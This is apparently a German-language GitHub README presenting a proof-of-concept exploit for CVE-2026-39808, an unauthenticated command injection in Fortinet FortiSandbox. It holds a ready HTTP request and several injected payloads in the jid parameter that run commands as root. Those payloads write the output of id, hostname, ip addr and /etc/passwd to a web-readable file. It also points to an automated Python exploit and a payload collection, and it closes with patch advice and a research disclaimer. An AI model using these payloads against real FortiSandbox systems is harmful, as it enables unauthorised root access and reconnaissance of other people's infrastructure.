
CVE-2026-39808
Dieses Repository enthält einen sauberen und gut dokumentierten Proof of Concept für CVE-2026-39808 — eine kritische, nicht authentifizierte Command-Injection-Schwachstelle in Fortinet FortiSandbox, die Sandbox-Escape und Remote-Codeausführung als root (uid=0) ermöglicht.
jid
Erfolgreiche Ausnutzung mit uid=0 gid=0 groups=0
| Versionsbereich | Status |
|---|---|
| FortiSandbox 4.4.0 – 4.4.8 | Verwundbar |
| FortiSandbox 5.0.0 – 5.0.5 | Verwundbar |
| 4.4.9+ / 5.0.6+ | Behoben |
GET /fortisandbox/job-detail/tracer-behavior?jid=%7C(id%3E/web/ng/out.txt)%7C HTTP/1.1
Host: your-lab-ip
Im Browser öffnen:
https://your-lab-ip/ng/out.txt
# Get IP address + hostname
jid=|(hostname; ip -4 addr show > /web/ng/out.txt)|
# Full system reconnaissance
jid=|(whoami; id; hostname; ip addr; cat /etc/passwd > /web/ng/out.txt)|
poc.py → Automatisierter Python-Exploitburp-request.txt → Einsatzbereite Burp-Suite-Anfragepayloads.md → Sammlung nützlicher Payloadsscreenshots/ → Schritt-für-Schritt-Screenshots der ExploitationREADME.md → Diese DateiAktualisiere FortiSandbox sofort auf eine der folgenden Versionen:
Fortinet hat offizielle Patches veröffentlicht, die diese Schwachstelle beheben.
Erstellt für Forschungs- und Lernzwecke
⭐ Gib diesem Repository einen Stern, wenn es dir geholfen hat!